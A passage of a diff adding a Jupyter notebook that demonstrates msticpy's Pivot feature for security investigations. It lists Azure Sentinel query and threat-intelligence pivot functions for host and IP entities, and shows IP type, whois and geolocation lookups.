+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "from msticpy.datamodel.pivot import Pivot\n",
+    "Pivot(namespace=globals())"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "> Note: Although you can assign the created Pivot object to a variable you normally don't need to do so.<br>\n",
+    "> You can access the current Pivot instance using the class attribute `Pivot.current`"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### See the list of providers loaded by the Pivot class\n",
+    "\n",
+    "Notice that TILookup was loaded even though we did not create an instance of TILookup beforehand."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 6,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/plain": [
+       "{'AzureSentinel': <msticpy.data.data_providers.QueryProvider at 0x1bb247790c8>,\n",
+       " 'TILookup': <msticpy.sectools.tilookup.TILookup at 0x1bb25d618c8>}"
+      ]
+     },
+     "execution_count": 6,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "Pivot.current.providers"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### After loading the Pivot class, entities have pivot functions added to them"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 7,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "Host pivot functions\n",
+      "\n"
+     ]
+    },
+    {
+     "data": {
+      "text/plain": [
+       "['AzureSentinel.SecurityAlert_list_related_alerts',\n",
+       " 'AzureSentinel.AzureNetworkAnalytics_CL_az_net_analytics',\n",
+       " 'AzureSentinel.AzureNetworkAnalytics_CL_get_ips_for_host',\n",
+       " 'AzureSentinel.Heartbeat_get_heartbeat_for_host',\n",
+       " 'AzureSentinel.AzureNetworkAnalytics_CL_list_azure_network_flows_by_host',\n",
+       " 'AzureSentinel.Heartbeat_get_info_by_hostname',\n",
+       " 'AzureSentinel.AuditLog_CL_auditd_all',\n",
+       " 'AzureSentinel.Syslog_sudo_activity',\n",
+       " 'AzureSentinel.Syslog_cron_activity',\n",
+       " 'AzureSentinel.Syslog_user_group_activity',\n",
+       " 'AzureSentinel.Syslog_all_syslog',\n",
+       " 'AzureSentinel.Syslog_squid_activity',\n",
+       " 'AzureSentinel.Syslog_user_logon',\n",
+       " 'AzureSentinel.Syslog_list_logons_for_host',\n",
+       " 'AzureSentinel.Syslog_list_host_logon_failures',\n",
+       " 'AzureSentinel.SecurityEvent_list_host_events',\n",
+       " 'AzureSentinel.SecurityEvent_list_host_events_by_id',\n",
+       " 'AzureSentinel.SecurityEvent_list_other_events',\n",
+       " 'AzureSentinel.SecurityEvent_get_host_logon',\n",
+       " 'AzureSentinel.SecurityEvent_list_host_logons',\n",
+       " 'AzureSentinel.SecurityEvent | where EventID == 4625_list_host_logon_failures',\n",
+       " 'AzureSentinel.SecurityEvent_list_all_logons_by_host',\n",
+       " 'AzureSentinel.SecurityEvent_list_host_processes',\n",
+       " 'AzureSentinel.SecurityEvent_get_process_tree',\n",
+       " 'AzureSentinel.SecurityEvent_get_parent_process',\n",
+       " 'AzureSentinel.SecurityEvent_list_processes_in_session',\n",
+       " 'util.dns_validate_tld',\n",
+       " 'util.dns_is_resolvable',\n",
+       " 'util.dns_in_abuse_list',\n",
+       " 'util.dns_components',\n",
+       " 'util.dns_resolve']"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "\n",
+      "IpAddress pivot functions\n",
+      "\n"
+     ]
+    },
+    {
+     "data": {
+      "text/plain": [
+       "['AzureSentinel.SecurityAlert_list_alerts_for_ip',\n",
+       " 'AzureSentinel.SigninLogs_list_aad_signins_for_ip',\n",
+       " 'AzureSentinel.AzureActivity_list_azure_activity_for_ip',\n",
+       " 'AzureSentinel.AzureNetworkAnalytics_CL_list_azure_network_flows_by_ip',\n",
+       " 'AzureSentinel.OfficeActivity_list_activity_for_ip',\n",
+       " 'AzureSentinel.AzureNetworkAnalytics_CL_get_host_for_ip',\n",
+       " 'AzureSentinel.Heartbeat_get_heartbeat_for_ip',\n",
+       " 'AzureSentinel.Heartbeat_get_info_by_ipaddress',\n",
+       " 'AzureSentinel.Syslog_list_logons_for_source_ip',\n",
+       " 'AzureSentinel.ThreatIntelligenceIndicator_list_indicators',\n",
+       " 'AzureSentinel.ThreatIntelligenceIndicator_list_indicators_by_ip',\n",
+       " 'AzureSentinel.ThreatIntelligenceIndicator_list_indicators_by_hash',\n",
+       " 'AzureSentinel.ThreatIntelligenceIndicator_list_indicators_by_filepath',\n",
+       " 'AzureSentinel.ThreatIntelligenceIndicator_list_indicators_by_domain',\n",
+       " 'AzureSentinel.ThreatIntelligenceIndicator_list_indicators_by_email',\n",
+       " 'AzureSentinel.ThreatIntelligenceIndicator_list_indicators_by_url',\n",
+       " 'ti.lookup_ip',\n",
+       " 'ti.lookup_ipv4',\n",
+       " 'ti.lookup_ipv4_OTX',\n",
+       " 'ti.lookup_ipv4_Tor',\n",
+       " 'ti.lookup_ipv4_VirusTotal',\n",
+       " 'ti.lookup_ipv4_XForce',\n",
+       " 'ti.lookup_ipv6',\n",
+       " 'ti.lookup_ipv6_OTX',\n",
+       " 'util.whois',\n",
+       " 'util.ip_type',\n",
+       " 'util.ip_rev_resolve',\n",
+       " 'util.geoloc',\n",
+       " 'util.geoloc_ips']"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "print(\"Host pivot functions\\n\")\n",
+    "display(entities.Host.get_pivot_list())\n",
+    "print(\"\\nIpAddress pivot functions\\n\")\n",
+    "display(entities.IpAddress.get_pivot_list())"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### Pivot functions are grouped into containers\n",
+    "\n",
+    "Data queries are grouped into a container with the name of the data provider to which they belong.\n",
+    "E.g. AzureSentinel queries are in a container of that name, Spunk queries would be in a \"Splunk\" container.\n",
+    "\n",
+    "TI lookups are put into a \"ti\" container\n",
+    "\n",
+    "All other built-in functions are added to the \"other\" container.\n",
+    "\n",
+    "The containers themselves are callable and will return a list of their contents. \n",
+    "Containers are also iterable - each iteration returns a tuple (pair) of name/function values.\n",
+    "\n",
+    "In notebooks/IPython you can also use tab completion to get to the right function."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 8,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "SecurityAlert_list_related_alerts function\n",
+      "AzureNetworkAnalytics_CL_az_net_analytics function\n",
+      "AzureNetworkAnalytics_CL_get_ips_for_host function\n",
+      "Heartbeat_get_heartbeat_for_host function\n",
+      "AzureNetworkAnalytics_CL_list_azure_network_flows_by_host function\n",
+      "Heartbeat_get_info_by_hostname function\n",
+      "AuditLog_CL_auditd_all function\n",
+      "Syslog_sudo_activity function\n",
+      "Syslog_cron_activity function\n",
+      "Syslog_user_group_activity function\n",
+      "Syslog_all_syslog function\n",
+      "Syslog_squid_activity function\n",
+      "Syslog_user_logon function\n",
+      "Syslog_list_logons_for_host function\n",
+      "Syslog_list_host_logon_failures function\n",
+      "SecurityEvent_list_host_events function\n",
+      "SecurityEvent_list_host_events_by_id function\n",
+      "SecurityEvent_list_other_events function\n",
+      "SecurityEvent_get_host_logon function\n",
+      "SecurityEvent_list_host_logons function\n",
+      "SecurityEvent | where EventID == 4625_list_host_logon_failures function\n",
+      "SecurityEvent_list_all_logons_by_host function\n",
+      "SecurityEvent_list_host_processes function\n",
+      "SecurityEvent_get_process_tree function\n",
+      "SecurityEvent_get_parent_process function\n",
+      "SecurityEvent_list_processes_in_session function\n"
+     ]
+    }
+   ],
+   "source": [
+    "entities.Host.AzureSentinel()"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 9,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/plain": [
+       "['Syslog_user_logon',\n",
+       " 'Syslog_list_logons_for_host',\n",
+       " 'Syslog_list_host_logon_failures',\n",
+       " 'SecurityEvent_get_host_logon',\n",
+       " 'SecurityEvent_list_host_logons',\n",
+       " 'SecurityEvent | where EventID == 4625_list_host_logon_failures',\n",
+       " 'SecurityEvent_list_all_logons_by_host']"
+      ]
+     },
+     "execution_count": 9,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "[query for query, _ in entities.Host.AzureSentinel if \"logon\" in query]"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "This is alternative way of listing the pivots for an Entity"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 12,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/plain": [
+       "['AzureSentinel.SecurityAlert_list_related_alerts',\n",
+       " 'AzureSentinel.AzureNetworkAnalytics_CL_az_net_analytics',\n",
+       " 'AzureSentinel.AzureNetworkAnalytics_CL_get_ips_for_host',\n",
+       " 'AzureSentinel.Heartbeat_get_heartbeat_for_host',\n",
+       " 'AzureSentinel.AzureNetworkAnalytics_CL_list_azure_network_flows_by_host',\n",
+       " 'AzureSentinel.Heartbeat_get_info_by_hostname',\n",
+       " 'AzureSentinel.AuditLog_CL_auditd_all',\n",
+       " 'AzureSentinel.Syslog_sudo_activity',\n",
+       " 'AzureSentinel.Syslog_cron_activity',\n",
+       " 'AzureSentinel.Syslog_user_group_activity',\n",
+       " 'AzureSentinel.Syslog_all_syslog',\n",
+       " 'AzureSentinel.Syslog_squid_activity',\n",
+       " 'AzureSentinel.Syslog_user_logon',\n",
+       " 'AzureSentinel.Syslog_list_logons_for_host',\n",
+       " 'AzureSentinel.Syslog_list_host_logon_failures',\n",
+       " 'AzureSentinel.SecurityEvent_list_host_events',\n",
+       " 'AzureSentinel.SecurityEvent_list_host_events_by_id',\n",
+       " 'AzureSentinel.SecurityEvent_list_other_events',\n",
+       " 'AzureSentinel.SecurityEvent_get_host_logon',\n",
+       " 'AzureSentinel.SecurityEvent_list_host_logons',\n",
+       " 'AzureSentinel.SecurityEvent | where EventID == 4625_list_host_logon_failures',\n",
+       " 'AzureSentinel.SecurityEvent_list_all_logons_by_host',\n",
+       " 'AzureSentinel.SecurityEvent_list_host_processes',\n",
+       " 'AzureSentinel.SecurityEvent_get_process_tree',\n",
+       " 'AzureSentinel.SecurityEvent_get_parent_process',\n",
+       " 'AzureSentinel.SecurityEvent_list_processes_in_session',\n",
+       " 'util.dns_validate_tld',\n",
+       " 'util.dns_is_resolvable',\n",
+       " 'util.dns_in_abuse_list',\n",
+       " 'util.dns_components',\n",
+       " 'util.dns_resolve']"
+      ]
+     },
+     "execution_count": 12,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "entities.Host.pivots()"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Using the Pivot Browser\n",
+    "\n",
+    "Pivot also has a utility that allows you to browse entities and the \n",
+    "pivot functions attached to them. You can search for functions with\n",
+    "desired keywords, view help for the specific function and copy the function\n",
+    "signature to paste into a code cell.\n"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 13,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "application/vnd.jupyter.widget-view+json": {
+       "model_id": "6cbb39001d7245cc8347dd81f7a8dc07",
+       "version_major": 2,
+       "version_minor": 0
+      },
+      "text/plain": [
+       "VBox(children=(HBox(children=(VBox(children=(HTML(value='<b>Entities</b>'), Select(description='entity', layou…"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "Pivot.browse()"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Running a pivot function\n",
+    "\n",
+    "Pivot functions have flexible input types. They can be used with the following types of parameters:\n",
+    "\n",
+    "- entity instances (e.g. where you have an IpAddress entity with a populated address field)\n",
+    "- single values (e.g. a DNS domain name)\n",
+    "- lists of values (e.g. a list of IpAddresses)\n",
+    "- pandas DataFrames (where one or more of the columns contains the input parameter data)\n",
+    "\n",
+    "Pivot functions normally return results as a dataframe (although some complex functions such as Notebooklets\n",
+    "can return composite results objects containing multiple dataframes and other object types.\n"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 10,
+   "metadata": {},
+   "outputs": [],
+   "source": [
+    "from msticpy.datamodel.entities import IpAddress, Host, Url, Account"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 11,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "List 'other' pivot functions for IpAddress\n",
+      "\n",
+      "whois function\n",
+      "ip_type function\n",
+      "ip_rev_resolve function\n",
+      "geoloc function\n",
+      "geoloc_ips function\n",
+      "\n",
+      "-------------------------------\n",
+      "\n",
+      "Print help for a function - IpAddress.util.type\n",
+      "\n"
+     ]
+    },
+    {
+     "data": {
+      "text/plain": [
+       "\u001b[1;31mSignature:\u001b[0m \u001b[0mIpAddress\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mip_type\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mip\u001b[0m\u001b[1;33m:\u001b[0m \u001b[0mstr\u001b[0m \u001b[1;33m=\u001b[0m \u001b[1;32mNone\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mip_str\u001b[0m\u001b[1;33m:\u001b[0m \u001b[0mstr\u001b[0m \u001b[1;33m=\u001b[0m \u001b[1;32mNone\u001b[0m\u001b[1;33m)\u001b[0m \u001b[1;33m->\u001b[0m \u001b[0mstr\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n",
+       "\u001b[1;31mDocstring:\u001b[0m\n",
+       "Validate value is an IP address and deteremine IPType category.\n",
+       "\n",
+       "(IPAddress category is e.g. Private/Public/Multicast).\n",
+       "\n",
+       "Parameters\n",
+       "----------\n",
+       "ip : str\n",
+       "    The string of the IP Address\n",
+       "ip_str : str\n",
+       "    The string of the IP Address - alias for `ip`\n",
+       "\n",
+       "Returns\n",
+       "-------\n",
+       "str\n",
+       "    Returns ip type string using ip address module\n",
+       "\u001b[1;31mFile:\u001b[0m      e:\\src\\microsoft\\msticpy\\msticpy\\sectools\\ip_utils.py\n",
+       "\u001b[1;31mType:\u001b[0m      function\n"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "print(\"List 'other' pivot functions for IpAddress\\n\")\n",
+    "IpAddress.util()\n",
+    "print()\n",
+    "print(\"-------------------------------\\n\")\n",
+    "print(\"Print help for a function - IpAddress.util.type\\n\")\n",
+    "IpAddress.util.ip_type?"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### Parameter names\n",
+    "- Positional parameter - If the function only accepts one parameter you can usually just supply it without a name - as a positional parameter (see first and third examples below)\n",
+    "- Native parameter - You can also use the native parameter name - i.e. the name that the underlying function expects and that will be shown in the help(function) output\n",
+    "- Generic parameter - You can also use the generic parameter name \"value\" in most cases.\n",
+    "\n",
+    "If in doubt, use help(entity.container.func) or entity.container.func?"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 12,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>ip</th>\n",
+       "      <th>result</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>10.1.1.1</td>\n",
+       "      <td>Private</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "         ip   result\n",
+       "0  10.1.1.1  Private"
+      ]
+     },
+     "execution_count": 12,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "IpAddress.util.ip_type(\"10.1.1.1\")"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 13,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>ip</th>\n",
+       "      <th>result</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>10.1.1.1</td>\n",
+       "      <td>Private</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "         ip   result\n",
+       "0  10.1.1.1  Private"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>ip</th>\n",
+       "      <th>result</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>157.53.1.1</td>\n",
+       "      <td>Public</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "           ip  result\n",
+       "0  157.53.1.1  Public"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>asn</th>\n",
+       "      <th>asn_cidr</th>\n",
+       "      <th>asn_country_code</th>\n",
+       "      <th>asn_date</th>\n",
+       "      <th>asn_description</th>\n",
+       "      <th>asn_registry</th>\n",
+       "      <th>nets</th>\n",
+       "      <th>nir</th>\n",
+       "      <th>query</th>\n",
+       "      <th>raw</th>\n",
+       "      <th>raw_referral</th>\n",
+       "      <th>referral</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>NA</td>\n",
+       "      <td>NA</td>\n",
+       "      <td>US</td>\n",
+       "      <td>2015-04-01</td>\n",
+       "      <td>NA</td>\n",
+       "      <td>arin</td>\n",
+       "      <td>[{'cidr': '157.53.0.0/16', 'name': 'NETACTUATE-MDN-04', 'handle': 'NET-157-53-0-0-1', 'range': '...</td>\n",
+       "      <td>None</td>\n",
+       "      <td>157.53.1.1</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "  asn asn_cidr asn_country_code    asn_date asn_description asn_registry  \\\n",
+       "0  NA       NA               US  2015-04-01              NA         arin   \n",
+       "\n",
+       "                                                                                                  nets  \\\n",
+       "0  [{'cidr': '157.53.0.0/16', 'name': 'NETACTUATE-MDN-04', 'handle': 'NET-157-53-0-0-1', 'range': '...   \n",
+       "\n",
+       "    nir       query   raw raw_referral referral  \n",
+       "0  None  157.53.1.1  None         None     None  "
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>CountryCode</th>\n",
+       "      <th>CountryName</th>\n",
+       "      <th>State</th>\n",
+       "      <th>City</th>\n",
+       "      <th>Longitude</th>\n",
+       "      <th>Latitude</th>\n",
+       "      <th>Asn</th>\n",
+       "      <th>edges</th>\n",
+       "      <th>Type</th>\n",
+       "      <th>AdditionalData</th>\n",
+       "      <th>IpAddress</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>US</td>\n",
+       "      <td>United States</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "      <td>-97.822</td>\n",
+       "      <td>37.751</td>\n",
+       "      <td>None</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>geolocation</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>157.53.1.1</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "  CountryCode    CountryName State  City  Longitude  Latitude   Asn edges  \\\n",
+       "0          US  United States  None  None    -97.822    37.751  None    {}   \n",
+       "\n",
+       "          Type AdditionalData   IpAddress  \n",
+       "0  geolocation             {}  157.53.1.1  "
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "display(IpAddress.util.ip_type(\"10.1.1.1\"))\n",
+    "display(IpAddress.util.ip_type(ip_str=\"157.53.1.1\"))\n",
+    "display(IpAddress.util.whois(\"157.53.1.1\"))\n",
+    "display(IpAddress.util.geoloc(value=\"157.53.1.1\"))"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### Using an entity as a parameter\n",
+    "\n",
+    "Behind the scenes the Pivot api is using a mapping of\n",
+    "entity attributes to supply the right value to the function parameter."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 14,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>ip</th>\n",
+       "      <th>result</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>10.1.1.1</td>\n",
+       "      <td>Private</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "         ip   result\n",
+       "0  10.1.1.1  Private"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>ip</th>\n",
+       "      <th>result</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>157.53.1.1</td>\n",
+       "      <td>Public</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "           ip  result\n",
+       "0  157.53.1.1  Public"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>asn</th>\n",
+       "      <th>asn_cidr</th>\n",
+       "      <th>asn_country_code</th>\n",
+       "      <th>asn_date</th>\n",
+       "      <th>asn_description</th>\n",
+       "      <th>asn_registry</th>\n",
+       "      <th>nets</th>\n",
+       "      <th>nir</th>\n",
+       "      <th>query</th>\n",
+       "      <th>raw</th>\n",
+       "      <th>raw_referral</th>\n",
+       "      <th>referral</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>NA</td>\n",
+       "      <td>NA</td>\n",
+       "      <td>US</td>\n",
+       "      <td>2015-04-01</td>\n",
+       "      <td>NA</td>\n",
+       "      <td>arin</td>\n",
+       "      <td>[{'cidr': '157.53.0.0/16', 'name': 'NETACTUATE-MDN-04', 'handle': 'NET-157-53-0-0-1', 'range': '...</td>\n",
+       "      <td>None</td>\n",
+       "      <td>157.53.1.1</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "  asn asn_cidr asn_country_code    asn_date asn_description asn_registry  \\\n",
+       "0  NA       NA               US  2015-04-01              NA         arin   \n",
+       "\n",
+       "                                                                                                  nets  \\\n",
+       "0  [{'cidr': '157.53.0.0/16', 'name': 'NETACTUATE-MDN-04', 'handle': 'NET-157-53-0-0-1', 'range': '...   \n",
+       "\n",
+       "    nir       query   raw raw_referral referral  \n",
+       "0  None  157.53.1.1  None         None     None  "
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>CountryCode</th>\n",
+       "      <th>CountryName</th>\n",
+       "      <th>State</th>\n",
+       "      <th>City</th>\n",
+       "      <th>Longitude</th>\n",
+       "      <th>Latitude</th>\n",
+       "      <th>Asn</th>\n",
+       "      <th>edges</th>\n",
+       "      <th>Type</th>\n",
+       "      <th>AdditionalData</th>\n",
+       "      <th>IpAddress</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>US</td>\n",
+       "      <td>United States</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "      <td>-97.822</td>\n",
+       "      <td>37.751</td>\n",
+       "      <td>None</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>geolocation</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>157.53.1.1</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "  CountryCode    CountryName State  City  Longitude  Latitude   Asn edges  \\\n",
+       "0          US  United States  None  None    -97.822    37.751  None    {}   \n",
+       "\n",
+       "          Type AdditionalData   IpAddress  \n",
+       "0  geolocation             {}  157.53.1.1  "
+      ]
+     },
+     "metadata": {},
